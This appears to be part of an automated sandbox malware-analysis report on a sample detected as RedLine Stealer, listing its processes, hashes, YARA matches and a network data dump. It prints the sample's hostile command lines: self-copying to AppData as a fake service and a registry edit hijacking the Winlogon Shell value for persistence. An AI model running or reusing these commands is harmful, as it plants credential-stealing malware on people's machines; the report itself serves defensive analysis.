                                                  2022-06-26 07:48:21 UTC48INData Raw: 6f 6d 5c 78 32 32 2c 5c 78 32 32 69 73 62 68 5c 78 32 32 3a 32 38 2c 5c 78 32 32 6a 73 6f 6e 70 5c 78 32 32 3a 74 72 75 65 2c 5c 78 32 32 6d 73 67 73 5c 78 32 32 3a 7b 5c 78 32 32 63 69 62 6c 5c 78 32 32 3a 5c 78 32 32 43 6c 65 61 72 20 53 65 61 72 63 68 5c 78 32 32 2c 5c 78 32 32 64 79 6d 5c 78 32 32 3a 5c 78 32 32 44 69 64 20 79 6f 75 20 6d 65 61 6e 3a 5c 78 32 32 2c 5c 78 32 32 6c 63 6b 79 5c 78 32 32 3a 5c 78 32 32 49 5c 5c 75 30 30 32 36 23 33 39 3b 6d 20 46 65 65 6c 69 6e 67 20 4c 75 63 6b 79 5c 78 32 32 2c 5c 78 32 32 6c 6d 6c 5c 78 32 32 3a 5c 78 32 32 4c 65 61 72 6e 20 6d 6f 72 65 5c 78 32 32 2c 5c 78 32 32 6f 73 6b 74 5c 78 32 32 3a 5c 78 32 32 49 6e 70 75 74 20 74 6f 6f 6c 73 5c 78 32 32 2c 5c 78 32 32 70 73 72 63 5c 78 32 32 3a 5c 78 32 32 54
                                                  Data Ascii: om\x22,\x22isbh\x22:28,\x22jsonp\x22:true,\x22msgs\x22:{\x22cibl\x22:\x22Clear Search\x22,\x22dym\x22:\x22Did you mean:\x22,\x22lcky\x22:\x22I\\u0026#39;m Feeling Lucky\x22,\x22lml\x22:\x22Learn more\x22,\x22oskt\x22:\x22Input tools\x22,\x22psrc\x22:\x22T
                                                  2022-06-26 07:48:21 UTC49INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Statistics

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:09:48:15
                                                  Start date:26/06/2022
                                                  Path:C:\Users\user\Desktop\atpRyiZGTE.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\atpRyiZGTE.exe"
                                                  Imagebase:0x10a0000
                                                  File size:1598976 bytes
                                                  MD5 hash:0515B4D32D6D65D19832858957F0847F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.450115307.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.450115307.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.448862255.00000000048DB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.448862255.00000000048DB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low

                                                  General

                                                  Target ID:13
                                                  Start time:09:49:00
                                                  Start date:26/06/2022
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:cmd" /c ping 127.0.0.1 -n 38 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\LightKeeperService.exe,
                                                  Imagebase:0x1190000
                                                  File size:232960 bytes
                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Target ID:14
                                                  Start time:09:49:01
                                                  Start date:26/06/2022
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff647620000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Target ID:15
                                                  Start time:09:49:02
                                                  Start date:26/06/2022
                                                  Path:C:\Windows\SysWOW64\PING.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:ping 127.0.0.1 -n 38
                                                  Imagebase:0xa50000
                                                  File size:18944 bytes
                                                  MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Target ID:19
                                                  Start time:09:49:32
                                                  Start date:26/06/2022
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:cmd" /c ping 127.0.0.1 -n 45 > nul && copy "C:\Users\user\Desktop\atpRyiZGTE.exe" "C:\Users\user\AppData\Roaming\LightKeeperService.exe" && ping 127.0.0.1 -n 45 > nul && "C:\Users\user\AppData\Roaming\LightKeeperService.exe
                                                  Imagebase:0x1190000
                                                  File size:232960 bytes
                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Target ID:20
                                                  Start time:09:49:33
                                                  Start date:26/06/2022
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff647620000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Target ID:21
                                                  Start time:09:49:34
                                                  Start date:26/06/2022
                                                  Path:C:\Windows\SysWOW64\PING.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:ping 127.0.0.1 -n 45
                                                  Imagebase:0xa50000
                                                  File size:18944 bytes
                                                  MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Target ID:23
                                                  Start time:09:49:42
                                                  Start date:26/06/2022
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\LightKeeperService.exe,"
                                                  Imagebase:0x7ff7338d0000
                                                  File size:59392 bytes
                                                  MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  General

                                                  Target ID:30
                                                  Start time:09:50:22
                                                  Start date:26/06/2022
                                                  Path:C:\Windows\SysWOW64\PING.EXE
                                                  Wow64 process (32bit):
                                                  Commandline:ping 127.0.0.1 -n 45
                                                  Imagebase:
                                                  File size:18944 bytes
                                                  MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Disassembly

                                                  No disassembly